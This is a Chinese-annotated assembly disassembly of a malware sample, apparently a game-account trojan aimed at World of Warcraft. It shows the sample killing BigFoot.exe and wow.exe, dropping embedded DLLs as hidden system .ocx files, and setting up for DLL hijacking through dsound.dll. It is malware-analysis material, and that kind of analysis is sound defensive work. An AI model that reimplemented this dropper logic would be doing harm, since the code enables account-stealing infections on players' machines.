来源:http://web3.fimmu.com/sifa/img/wow.exe
MD5:1075c31ad368e04dda4e6d167947cacd
1.枚举系统进程,检查BigFoot.exe是否运行.
004011A0 /$ 81EC 28010000 sub esp, 128
004011A6 |. 53 push ebx
004011A7 |. 56 push esi
004011A8 |. 57 push edi
004011A9 |. 6A 00 push 0 ; /ProcessID = 0
004011AB |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004011AD |. E8 CA190000 call <jmp.&KERNEL32.CreateToolhelp32S>; \创建系统进程快照
004011B2 |. 8BD8 mov ebx, eax
004011B4 |. B9 4A000000 mov ecx, 4A
004011B9 |. 33C0 xor eax, eax
004011BB |. 8D7C24 0C lea edi, dword ptr [esp+C]
004011BF |. F3:AB rep stos dword ptr es:[edi]
004011C1 |. 8D4424 0C lea eax, dword ptr [esp+C]
004011C5 |. C74424 0C 280>mov dword ptr [esp+C], 128
004011CD |. 50 push eax ; /lppe
004011CE |. 53 push ebx ; |hSnapshot
004011CF |. E8 A2190000 call <jmp.&KERNEL32.Process32First> ; \获取快照中第一个进程句柄
004011D4 |. 85C0 test eax, eax
004011D6 |. 74 28 je short 00401200
004011D8 |. 8BB424 380100>mov esi, dword ptr [esp+138]
004011DF |. 8B3D 34304000 mov edi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcmpiA
004011E5 |> 8D4C24 30 /lea ecx, dword ptr [esp+30]
004011E9 |. 51 |push ecx
004011EA |. 56 |push esi
004011EB |. FFD7 |call edi ; 将BigFoot.exe与进程名相比较
004011ED |. 85C0 |test eax, eax
004011EF |. 74 22 |je short 00401213 ; 检查到BigFoot.exe就跳
004011F1 |. 8D5424 0C |lea edx, dword ptr [esp+C]
004011F5 |. 52 |push edx ; /lppe
004011F6 |. 53 |push ebx ; |hSnapshot
004011F7 |. E8 74190000 |call <jmp.&KERNEL32.Process32Next> ; \获取下一个进程句柄
004011FC |. 85C0 |test eax, eax
004011FE |.^ 75 E5 \jnz short 004011E5
00401200 |> 53 push ebx ; /hObject
00401201 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \结束
00401207 |. 5F pop edi
00401208 |. 5E pop esi
00401209 |. 33C0 xor eax, eax
0040120B |. 5B pop ebx
0040120C |. 81C4 28010000 add esp, 128
00401212 |. C3 retn
00401213 |> 8B4424 14 mov eax, dword ptr [esp+14]
00401217 |. 5F pop edi
00401218 |. 5E pop esi
00401219 |. 5B pop ebx
0040121A |. 81C4 28010000 add esp, 128
00401220 \. C3 retn
004028A4 |. 8B3D 90304000 mov edi, dword ptr [<&KERNEL32.Termi>; kernel32.TerminateProcess
004028AA |. 8B2D 8C304000 mov ebp, dword ptr [<&KERNEL32.OpenP>; kernel32.OpenProcess
004028B0 |. 8BF0 mov esi, eax
004028B2 |. 33DB xor ebx, ebx
004028B4 |. 83C4 04 add esp, 4
004028B7 |. 3BF3 cmp esi, ebx
004028B9 |. 76 15 jbe short 004028D0 ; 若没有检测到BigFoot.exe,则跳
004028BB |. 68 D0070000 push 7D0 ; /Timeout = 2000. ms
004028C0 |. FF15 88304000 call dword ptr [<&KERNEL32.Sleep>] ; \睡眠2000ms
004028C6 |. 53 push ebx ; /ExitCode => 0
004028C7 |. 56 push esi ; |/ProcessId
004028C8 |. 53 push ebx ; ||Inheritable => FALSE
004028C9 |. 6A 01 push 1 ; ||Access = TERMINATE
004028CB |. FFD5 call ebp ; |\打开BigFoot.exe进程
004028CD |. 50 push eax ; |hProcess
004028CE |. FFD7 call edi ; \结束BigFoot.exe
004011A0 /$ 81EC 28010000 sub esp, 128
004011A6 |. 53 push ebx
004011A7 |. 56 push esi
004011A8 |. 57 push edi
004011A9 |. 6A 00 push 0 ; /ProcessID = 0
004011AB |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004011AD |. E8 CA190000 call <jmp.&KERNEL32.CreateToolhelp32S>; \创建系统进程快照
004011B2 |. 8BD8 mov ebx, eax
004011B4 |. B9 4A000000 mov ecx, 4A
004011B9 |. 33C0 xor eax, eax
004011BB |. 8D7C24 0C lea edi, dword ptr [esp+C]
004011BF |. F3:AB rep stos dword ptr es:[edi]
004011C1 |. 8D4424 0C lea eax, dword ptr [esp+C]
004011C5 |. C74424 0C 280>mov dword ptr [esp+C], 128
004011CD |. 50 push eax ; /lppe
004011CE |. 53 push ebx ; |hSnapshot
004011CF |. E8 A2190000 call <jmp.&KERNEL32.Process32First> ; \获取快照中第一个进程句柄
004011D4 |. 85C0 test eax, eax
004011D6 |. 74 28 je short 00401200
004011D8 |. 8BB424 380100>mov esi, dword ptr [esp+138]
004011DF |. 8B3D 34304000 mov edi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcmpiA
004011E5 |> 8D4C24 30 /lea ecx, dword ptr [esp+30]
004011E9 |. 51 |push ecx
004011EA |. 56 |push esi
004011EB |. FFD7 |call edi ; 将wow.exe与进程名相比较
004011ED |. 85C0 |test eax, eax
004011EF |. 74 22 |je short 00401213 ; 检查到wow.exe就跳
004011F1 |. 8D5424 0C |lea edx, dword ptr [esp+C]
004011F5 |. 52 |push edx ; /lppe
004011F6 |. 53 |push ebx ; |hSnapshot
004011F7 |. E8 74190000 |call <jmp.&KERNEL32.Process32Next> ; \获取下一个进程句柄
004011FC |. 85C0 |test eax, eax
004011FE |.^ 75 E5 \jnz short 004011E5
00401200 |> 53 push ebx ; /hObject
00401201 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \结束
00401207 |. 5F pop edi
00401208 |. 5E pop esi
00401209 |. 33C0 xor eax, eax
0040120B |. 5B pop ebx
0040120C |. 81C4 28010000 add esp, 128
00401212 |. C3 retn
00401213 |> 8B4424 14 mov eax, dword ptr [esp+14]
00401217 |. 5F pop edi
00401218 |. 5E pop esi
00401219 |. 5B pop ebx
0040121A |. 81C4 28010000 add esp, 128
00401220 \. C3 retn
004028E3 |. 68 88130000 push 1388 ; /Timeout = 5000. ms
004028E8 |. FF15 88304000 call dword ptr [<&KERNEL32.Sleep>] ; \暂停5000ms
004028EE |> 53 /push ebx
004028EF |. 56 |push esi
004028F0 |. 53 |push ebx
004028F1 |. 6A 01 |push 1
004028F3 |. FFD5 |call ebp ; 打开进程
004028F5 |. 50 |push eax
004028F6 |. FFD7 |call edi ; 结束wow.exe
004028F8 |. 68 78414000 |push 00404178 ; ASCII "wow.exe"
004028FD |. E8 9EE8FFFF |call 004011A0
00402902 |. 8BF0 |mov esi, eax
00402904 |. 83C4 04 |add esp, 4
00402907 |. 3BF3 |cmp esi, ebx
00402909 |.^ 77 E3 \ja short 004028EE
0040290B |> \68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
00402910 |. FF15 88304000 call dword ptr [<&KERNEL32.Sleep>] ; \睡眠3000ms
00402916 |. 8B2D 7C304000 mov ebp, dword ptr [<&KERNEL32.GetSy>; kernel32.GetSystemDirectoryA
0040291C |. 8D8424 340400>lea eax, dword ptr [esp+434]
00402923 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00402928 |. 50 push eax ; |Buffer
00402929 |. FFD5 call ebp ; \检索系统文件夹路径
0040292B |. 8B35 4C304000 mov esi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcatA
00402931 |. 8D8C24 340400>lea ecx, dword ptr [esp+434]
00402938 |. 68 6C414000 push 0040416C ; /StringToAdd = "\1016.ocx"
0040293D |. 51 push ecx ; |ConcatString
0040293E |. FFD6 call esi ; \连接字符%windir%\system32\1016.ocx
00402940 |. FF15 78304000 call dword ptr [<&KERNEL32.GetTickCou>; [返回系统开机时间
00402946 |. 33D2 xor edx, edx
00402948 |. 05 00000001 add eax, 1000000
0040294D |. 895424 11 mov dword ptr [esp+11], edx
00402951 |. 50 push eax ; /<%x>
00402952 |. 895424 19 mov dword ptr [esp+19], edx ; |
00402956 |. 8D4424 14 lea eax, dword ptr [esp+14] ; |
0040295A |. 895424 1D mov dword ptr [esp+1D], edx ; |
0040295E |. 68 68414000 push 00404168 ; |format = "%x"
00402963 |. 895424 25 mov dword ptr [esp+25], edx ; |
00402967 |. 50 push eax ; |s
00402968 |. 66:895424 2D mov word ptr [esp+2D], dx ; |
0040296D |. 885C24 1C mov byte ptr [esp+1C], bl ; |
00402971 |. 885424 2F mov byte ptr [esp+2F], dl ; |
00402975 |. FF15 A0304000 call dword ptr [<&MSVCRT.sprintf>] ; \输出系统开机时间
0040297B |. 83C4 0C add esp, 0C
0040297E |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00402982 |. 68 58414000 push 00404158 ; ASCII "wuozwtmp.dat"
00402987 |. 51 push ecx
00402988 |. FFD6 call esi ; 连接字符 开机时间+wuozwtmp.dat
0040298A |. B9 40000000 mov ecx, 40
0040298F |. 33C0 xor eax, eax
00402991 |. 8D7C24 25 lea edi, dword ptr [esp+25]
00402995 |. 885C24 24 mov byte ptr [esp+24], bl
00402999 |. F3:AB rep stos dword ptr es:[edi]
0040299B |. 66:AB stos word ptr es:[edi]
0040299D |. 8D5424 24 lea edx, dword ptr [esp+24]
004029A1 |. 52 push edx ; /Buffer
004029A2 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
004029A7 |. AA stos byte ptr es:[edi] ; |
004029A8 |. FF15 50304000 call dword ptr [<&KERNEL32.GetTempPat>; \检索系统临时目录
004029AE |. 8D4424 10 lea eax, dword ptr [esp+10]
004029B2 |. 8D4C24 24 lea ecx, dword ptr [esp+24]
004029B6 |. 50 push eax
004029B7 |. 51 push ecx
004029B8 |. FFD6 call esi ; 将%temp%与开机时间+wuozwtmp.dat连接
004029BA |. 8D5424 24 lea edx, dword ptr [esp+24]
004029BE |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004029C0 |. 8D8424 380400>lea eax, dword ptr [esp+438] ; |
004029C7 |. 52 push edx ; |NewName
004029C8 |. 50 push eax ; |ExistingName
004029C9 |. FF15 74304000 call dword ptr [<&KERNEL32.MoveFileEx>; \将%windir%\1016.ocx移动到临时目录
00401000 /$ 51 push ecx
00401001 |. 53 push ebx
00401002 |. 55 push ebp
00401003 |. 56 push esi
00401004 |. 57 push edi
00401005 |. 6A 00 push 0 ; /pModule = NULL
00401007 |. FF15 20304000 call dword ptr [<&KERNEL32.GetModuleH>; \返回自身句柄
0040100D |. 8BF0 mov esi, eax
0040100F |. 8B4424 18 mov eax, dword ptr [esp+18]
00401013 |. 25 FFFF0000 and eax, 0FFFF
00401018 |. 68 00404000 push 00404000 ; /ResourceType = "DLL"
0040101D |. 50 push eax ; |ResourceName
0040101E |. 56 push esi ; |hModule
0040101F |. FF15 1C304000 call dword ptr [<&KERNEL32.FindResour>; \查找0x6C号的DLL资源
00401025 |. 8BF8 mov edi, eax
00401027 |. 85FF test edi, edi
00401029 |. 75 06 jnz short 00401031 ; 成功则继续
0040102B |. 5F pop edi
0040102C |. 5E pop esi
0040102D |. 5D pop ebp
0040102E |. 5B pop ebx
0040102F |. 59 pop ecx
00401030 |. C3 retn
00401031 |> 57 push edi ; /hResource
00401032 |. 56 push esi ; |hModule
00401033 |. FF15 18304000 call dword ptr [<&KERNEL32.LoadResour>; \调取资源
00401039 |. 85C0 test eax, eax
0040103B |. 75 06 jnz short 00401043 ; 成功则继续
0040103D |. 5F pop edi
0040103E |. 5E pop esi
0040103F |. 5D pop ebp
00401040 |. 5B pop ebx
00401041 |. 59 pop ecx
00401042 |. C3 retn
00401043 |> 50 push eax ; /nHandles
00401044 |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour>; \设置当前内存地址为4050C0
0040104A |. 8BE8 mov ebp, eax
0040104C |. 85ED test ebp, ebp
0040104E |. 75 06 jnz short 00401056 ; 成功则继续
00401050 |. 5F pop edi
00401051 |. 5E pop esi
00401052 |. 5D pop ebp
00401053 |. 5B pop ebx
00401054 |. 59 pop ecx
00401055 |. C3 retn
00401056 |> 57 push edi ; /hResource
00401057 |. 56 push esi ; |hModule
00401058 |. FF15 10304000 call dword ptr [<&KERNEL32.SizeofReso>; \返回资源大小
0040105E |. 8B7C24 1C mov edi, dword ptr [esp+1C]
00401062 |. 6A 00 push 0 ; /FileAttributes = 0
00401064 |. 57 push edi ; |FileName
00401065 |. 8BD8 mov ebx, eax ; |
00401067 |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt>; \设置文件属性
0040106D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040106F |. 6A 00 push 0 ; |Attributes = 0
00401071 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401073 |. 6A 00 push 0 ; |pSecurity = NULL
00401075 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401077 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040107C |. 57 push edi ; |FileName
0040107D |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile>; \创建%windir%\system\1016.ocx
00401083 |. 8BF0 mov esi, eax
00401085 |. 83FE FF cmp esi, -1
00401088 |. 75 08 jnz short 00401092 ; 成功则继续
0040108A |. 5F pop edi
0040108B |. 5E pop esi
0040108C |. 5D pop ebp
0040108D |. 33C0 xor eax, eax
0040108F |. 5B pop ebx
00401090 |. 59 pop ecx
00401091 |. C3 retn
00401092 |> 8D4C24 10 lea ecx, dword ptr [esp+10]
00401096 |. 6A 00 push 0 ; /pOverlapped = NULL
00401098 |. 51 push ecx ; |pBytesWritten
00401099 |. 53 push ebx ; |nBytesToWrite
0040109A |. 55 push ebp ; |/nHandles
0040109B |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour>; |\SetHandleCount
004010A1 |. 50 push eax ; |Buffer
004010A2 |. 56 push esi ; |hFile
004010A3 |. FF15 04304000 call dword ptr [<&KERNEL32.WriteFile>>; \将virus.004050C0处的0x1600字节的数据写入1016.ocx
004010A9 |. 85C0 test eax, eax
004010AB |. 75 06 jnz short 004010B3 ; 成功则继续
004010AD |. 5F pop edi
004010AE |. 5E pop esi
004010AF |. 5D pop ebp
004010B0 |. 5B pop ebx
004010B1 |. 59 pop ecx
004010B2 |. C3 retn
004010B3 |> 56 push esi ; /hObject
004010B4 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \关闭句柄
004010BA |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
004010BC |. 57 push edi ; |FileName
004010BD |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt>; \设置隐藏,系统属性
004010C3 |. 5F pop edi
004010C4 |. 5E pop esi
004010C5 |. 5D pop ebp
004010C6 |. B8 01000000 mov eax, 1
004010CB |. 5B pop ebx
004010CC |. 59 pop ecx
004010CD \. C3 retn
004029E9 |. 68 48414000 push 00404148 ; /String2 = "WinWcolw.ocx"
004029EE |. 68 94414000 push 00404194 ; |String1 = virus.00404194
004029F3 |. FF15 44304000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \复制WinWcolw.ocx到缓冲区
004029F9 |. B9 00010000 mov ecx, 100
004029FE |. 33C0 xor eax, eax
00402A00 |. 8DBC24 340400>lea edi, dword ptr [esp+434]
00402A07 |. 8D9424 340400>lea edx, dword ptr [esp+434]
00402A0E |. 68 04010000 push 104
00402A13 |. 52 push edx
00402A14 |. F3:AB rep stos dword ptr es:[edi]
00402A16 |. FFD5 call ebp ; 检索系统文件夹路径
00402A18 |. 8D8424 340400>lea eax, dword ptr [esp+434]
00402A1F |. 68 90404000 push 00404090
00402A24 |. 50 push eax
00402A25 |. FFD6 call esi ; 连接字符%windir%\system32\
00402A27 |. 8D8C24 340400>lea ecx, dword ptr [esp+434]
00402A2E |. 68 94414000 push 00404194 ; ASCII "WinWcolw.ocx"
00402A33 |. 51 push ecx
00402A34 |. FFD6 call esi ; 连接字符%windir%\system32\WinWcolw.ocx
00402A36 |. 8D9424 340400>lea edx, dword ptr [esp+434]
00402A3D |. 52 push edx
00402A3E |. 6A 6A push 6A
00402A40 |. E8 BBE5FFFF call 00401000
00401000 /$ 51 push ecx
00401001 |. 53 push ebx
00401002 |. 55 push ebp
00401003 |. 56 push esi
00401004 |. 57 push edi
00401005 |. 6A 00 push 0 ; /pModule = NULL
00401007 |. FF15 20304000 call dword ptr [<&KERNEL32.GetModuleH>; \返回自身句柄
0040100D |. 8BF0 mov esi, eax
0040100F |. 8B4424 18 mov eax, dword ptr [esp+18]
00401013 |. 25 FFFF0000 and eax, 0FFFF
00401018 |. 68 00404000 push 00404000 ; /ResourceType = "DLL"
0040101D |. 50 push eax ; |ResourceName
0040101E |. 56 push esi ; |hModule
0040101F |. FF15 1C304000 call dword ptr [<&KERNEL32.FindResour>; \查找0x6A号DLL资源
00401025 |. 8BF8 mov edi, eax
00401027 |. 85FF test edi, edi
00401029 |. 75 06 jnz short 00401031 ; 成功则继续
0040102B |. 5F pop edi
0040102C |. 5E pop esi
0040102D |. 5D pop ebp
0040102E |. 5B pop ebx
0040102F |. 59 pop ecx
00401030 |. C3 retn
00401031 |> 57 push edi ; /hResource
00401032 |. 56 push esi ; |hModule
00401033 |. FF15 18304000 call dword ptr [<&KERNEL32.LoadResour>; \装载资源
00401039 |. 85C0 test eax, eax
0040103B |. 75 06 jnz short 00401043 ; 成功则继续
0040103D |. 5F pop edi
0040103E |. 5E pop esi
0040103F |. 5D pop ebp
00401040 |. 5B pop ebx
00401041 |. 59 pop ecx
00401042 |. C3 retn
00401043 |> 50 push eax ; /nHandles
00401044 |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour>; \设置当前内存地址为4066C0
0040104A |. 8BE8 mov ebp, eax
0040104C |. 85ED test ebp, ebp
0040104E |. 75 06 jnz short 00401056 ; 成功则继续
00401050 |. 5F pop edi
00401051 |. 5E pop esi
00401052 |. 5D pop ebp
00401053 |. 5B pop ebx
00401054 |. 59 pop ecx
00401055 |. C3 retn
00401056 |> 57 push edi ; /hResource
00401057 |. 56 push esi ; |hModule
00401058 |. FF15 10304000 call dword ptr [<&KERNEL32.SizeofReso>; \返回资源大小
0040105E |. 8B7C24 1C mov edi, dword ptr [esp+1C]
00401062 |. 6A 00 push 0 ; /FileAttributes = 0
00401064 |. 57 push edi ; |FileName
00401065 |. 8BD8 mov ebx, eax ; |
00401067 |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt>; \设置文件属性
0040106D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040106F |. 6A 00 push 0 ; |Attributes = 0
00401071 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401073 |. 6A 00 push 0 ; |pSecurity = NULL
00401075 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401077 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040107C |. 57 push edi ; |FileName
0040107D |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile>; \创建文件%windir%\system32\WinWcolw.ocx
00401083 |. 8BF0 mov esi, eax
00401085 |. 83FE FF cmp esi, -1
00401088 |. 75 08 jnz short 00401092 ; 成功则继续
0040108A |. 5F pop edi
0040108B |. 5E pop esi
0040108C |. 5D pop ebp
0040108D |. 33C0 xor eax, eax
0040108F |. 5B pop ebx
00401090 |. 59 pop ecx
00401091 |. C3 retn
00401092 |> 8D4C24 10 lea ecx, dword ptr [esp+10]
00401096 |. 6A 00 push 0 ; /pOverlapped = NULL
00401098 |. 51 push ecx ; |pBytesWritten
00401099 |. 53 push ebx ; |nBytesToWrite
0040109A |. 55 push ebp ; |/nHandles
0040109B |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour>; |\SetHandleCount
004010A1 |. 50 push eax ; |Buffer
004010A2 |. 56 push esi ; |hFile
004010A3 |. FF15 04304000 call dword ptr [<&KERNEL32.WriteFile>>; \将virus.004066C0处的0xDA00字节的数据写入WinWcolw.ocx
004010A9 |. 85C0 test eax, eax
004010AB |. 75 06 jnz short 004010B3 ; 成功则继续
004010AD |. 5F pop edi
004010AE |. 5E pop esi
004010AF |. 5D pop ebp
004010B0 |. 5B pop ebx
004010B1 |. 59 pop ecx
004010B2 |. C3 retn
004010B3 |> 56 push esi ; /hObject
004010B4 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \关闭句柄
004010BA |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
004010BC |. 57 push edi ; |FileName
004010BD |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt>; \设置隐藏,系统属性
004010C3 |. 5F pop edi
004010C4 |. 5E pop esi
004010C5 |. 5D pop ebp
004010C6 |. B8 01000000 mov eax, 1
004010CB |. 5B pop ebx
004010CC |. 59 pop ecx
004010CD \. C3 retn
004010D0 /$ 81EC 04060000 sub esp, 604
004010D6 |. 8D4424 04 lea eax, dword ptr [esp+4]
004010DA |. 55 push ebp
004010DB |. 56 push esi
004010DC |. 57 push edi
004010DD |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004010E2 |. 50 push eax ; |PathBuffer
004010E3 |. 6A 00 push 0 ; |hModule = NULL
004010E5 |. FF15 2C304000 call dword ptr [<&KERNEL32.GetModuleF>; \返回自身所在路径
004010EB |. 8B35 08304000 mov esi, dword ptr [<&KERNEL32.Creat>; kernel32.CreateFileA
004010F1 |. 6A 00 push 0 ; /hTemplateFile = NULL
004010F3 |. 6A 00 push 0 ; |Attributes = 0
004010F5 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004010F7 |. 6A 00 push 0 ; |pSecurity = NULL
004010F9 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004010FB |. 8D4C24 24 lea ecx, dword ptr [esp+24] ; |
004010FF |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401104 |. 51 push ecx ; |FileName
00401105 |. FFD6 call esi ; \打开病毒原程序
00401107 |. 8B2D 00304000 mov ebp, dword ptr [<&KERNEL32.Close>; kernel32.CloseHandle
0040110D |. 8BF8 mov edi, eax
0040110F |. 83FF FF cmp edi, -1
00401112 |. 74 79 je short 0040118D ; 不成功则跳
00401114 |. 53 push ebx
00401115 |. 8B1D 28304000 mov ebx, dword ptr [<&KERNEL32.SetFi>; kernel32.SetFilePointer
0040111B |. 6A 02 push 2 ; /Origin = FILE_END
0040111D |. 6A 00 push 0 ; |pOffsetHi = NULL
0040111F |. 68 06FBFFFF push -4FA ; |OffsetLo = FFFFFB06 (-1274.)
00401124 |. 57 push edi ; |hFile
00401125 |. FFD3 call ebx ; \指针移至文件末尾倒数0x4FA字节处
00401127 |. 8D5424 10 lea edx, dword ptr [esp+10]
0040112B |. 6A 00 push 0 ; /pOverlapped = NULL
0040112D |. 52 push edx ; |pBytesRead
0040112E |. 8D8424 200100>lea eax, dword ptr [esp+120] ; |
00401135 |. 68 FA040000 push 4FA ; |BytesToRead = 4FA (1274.)
0040113A |. 50 push eax ; |Buffer
0040113B |. 57 push edi ; |hFile
0040113C |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \读取从0x4FA到virus.0012ED84的数据
00401142 |. 8B8C24 180600>mov ecx, dword ptr [esp+618]
00401149 |. 6A 00 push 0 ; /hTemplateFile = NULL
0040114B |. 6A 00 push 0 ; |Attributes = 0
0040114D |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040114F |. 6A 00 push 0 ; |pSecurity = NULL
00401151 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401153 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401158 |. 51 push ecx ; |FileName
00401159 |. FFD6 call esi ; \打开%windir%\system32\WinWcolw.ocx
0040115B |. 8BF0 mov esi, eax
0040115D |. 83FE FF cmp esi, -1
00401160 |. 74 27 je short 00401189 ; 成功则继续
00401162 |. 6A 02 push 2 ; /Origin = FILE_END
00401164 |. 6A 00 push 0 ; |pOffsetHi = NULL
00401166 |. 68 FA040000 push 4FA ; |OffsetLo = 4FA (1274.)
0040116B |. 56 push esi ; |hFile
0040116C |. FFD3 call ebx ; \指针移至文件倒数0x4FA字节处
0040116E |. 8D5424 10 lea edx, dword ptr [esp+10]
00401172 |. 6A 00 push 0 ; /pOverlapped = NULL
00401174 |. 52 push edx ; |pBytesWritten
00401175 |. 8D8424 200100>lea eax, dword ptr [esp+120] ; |
0040117C |. 68 FA040000 push 4FA ; |nBytesToWrite = 4FA (1274.)
00401181 |. 50 push eax ; |Buffer
00401182 |. 56 push esi ; |hFile
00401183 |. FF15 04304000 call dword ptr [<&KERNEL32.WriteFile>>; \写入数据
00401189 |> 56 push esi
0040118A |. FFD5 call ebp ; 关闭句柄
0040118C |. 5B pop ebx
0040118D |> 57 push edi
0040118E |. FFD5 call ebp ; 关闭句柄
00401190 |. 5F pop edi
00401191 |. 5E pop esi
00401192 |. 5D pop ebp
00401193 |. 81C4 04060000 add esp, 604
00401199 \. C3 retn
00401C10 /$ 83EC 7C sub esp, 7C
00401C13 |. 53 push ebx
00401C14 |. 55 push ebp
00401C15 |. 56 push esi
00401C16 |. 57 push edi
00401C17 |. B9 1E000000 mov ecx, 1E
00401C1C |. 33C0 xor eax, eax
00401C1E |. 8D7C24 11 lea edi, dword ptr [esp+11]
00401C22 |. C64424 10 00 mov byte ptr [esp+10], 0
00401C27 |. F3:AB rep stos dword ptr es:[edi]
00401C29 |. 8B2D 7C304000 mov ebp, dword ptr [<&KERNEL32.GetSy>; kernel32.GetSystemDirectoryA
00401C2F |. 6A 7B push 7B ; /BufSize = 7B (123.)
00401C31 |. 66:AB stos word ptr es:[edi] ; |
00401C33 |. 8D4424 14 lea eax, dword ptr [esp+14] ; |
00401C37 |. 50 push eax ; |Buffer
00401C38 |. FFD5 call ebp ; \检索系统文件夹路径
00401C3A |. BF 90404000 mov edi, 00404090
00401C3F |. 83C9 FF or ecx, FFFFFFFF
00401C42 |. 33C0 xor eax, eax
00401C44 |. 8D5424 10 lea edx, dword ptr [esp+10]
00401C48 |. F2:AE repne scas byte ptr es:[edi]
00401C4A |. F7D1 not ecx
00401C4C |. 2BF9 sub edi, ecx
00401C4E |. 50 push eax ; /hTemplateFile => NULL
00401C4F |. 8BF7 mov esi, edi ; |
00401C51 |. 8BD9 mov ebx, ecx ; |
00401C53 |. 8BFA mov edi, edx ; |
00401C55 |. 83C9 FF or ecx, FFFFFFFF ; |
00401C58 |. F2:AE repne scas byte ptr es:[edi] ; |
00401C5A |. 8BCB mov ecx, ebx ; |
00401C5C |. 4F dec edi ; |
00401C5D |. C1E9 02 shr ecx, 2 ; |
00401C60 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401C62 |. 8BCB mov ecx, ebx ; |
00401C64 |. 8D5424 14 lea edx, dword ptr [esp+14] ; |
00401C68 |. 83E1 03 and ecx, 3 ; |
00401C6B |. 50 push eax ; |Attributes => 0
00401C6C |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
00401C6E |. 8BBC24 9C0000>mov edi, dword ptr [esp+9C] ; |
00401C75 |. 83C9 FF or ecx, FFFFFFFF ; |
00401C78 |. F2:AE repne scas byte ptr es:[edi] ; |
00401C7A |. F7D1 not ecx ; |
00401C7C |. 2BF9 sub edi, ecx ; |
00401C7E |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401C80 |. 8BF7 mov esi, edi ; |
00401C82 |. 8BD9 mov ebx, ecx ; |
00401C84 |. 8BFA mov edi, edx ; |
00401C86 |. 83C9 FF or ecx, FFFFFFFF ; |
00401C89 |. F2:AE repne scas byte ptr es:[edi] ; |
00401C8B |. 8BCB mov ecx, ebx ; |
00401C8D |. 4F dec edi ; |
00401C8E |. C1E9 02 shr ecx, 2 ; |
00401C91 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401C93 |. 8BCB mov ecx, ebx ; |
00401C95 |. 50 push eax ; |pSecurity => NULL
00401C96 |. 83E1 03 and ecx, 3 ; |
00401C99 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401C9B |. 8D4424 24 lea eax, dword ptr [esp+24] ; |
00401C9F |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401CA4 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
00401CA6 |. 50 push eax ; |FileName
00401CA7 |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile>; \打开%windir%\system32\dsound.dll
00401CAD |. 8BF0 mov esi, eax
00401CAF |. 83FE FF cmp esi, -1
00401CB2 |. 0F85 D8000000 jnz 00401D90 ; 若成功则跳走
00401CB8 |. B9 1E000000 mov ecx, 1E
00401CBD |. 33C0 xor eax, eax
00401CBF |. 8D7C24 10 lea edi, dword ptr [esp+10]
00401CC3 |. 6A 7B push 7B ; /BufSize = 7B (123.)
00401CC5 |. F3:AB rep stos dword ptr es:[edi] ; |
00401CC7 |. 66:AB stos word ptr es:[edi] ; |
00401CC9 |. 8D4C24 14 lea ecx, dword ptr [esp+14] ; |
00401CCD |. 51 push ecx ; |Buffer
00401CCE |. AA stos byte ptr es:[edi] ; |
00401CCF |. FFD5 call ebp ; \检索系统文件夹路径
00401CD1 |. 8B1D 4C304000 mov ebx, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcatA
00401CD7 |. 8D5424 10 lea edx, dword ptr [esp+10]
00401CDB |. 68 84404000 push 00404084 ; /StringToAdd = "\..\system\"
00401CE0 |. 52 push edx ; |ConcatString
00401CE1 |. FFD3 call ebx ; \连接字符串%windir%\system\
00401CE3 |. 8B8424 940000>mov eax, dword ptr [esp+94]
00401CEA |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00401CEE |. 50 push eax ; /StringToAdd
00401CEF |. 51 push ecx ; |ConcatString
00401CF0 |. FFD3 call ebx ; \连接字符串%windir%\system\dsound.dll
00401CF2 |. 6A 00 push 0 ; /hTemplateFile = NULL
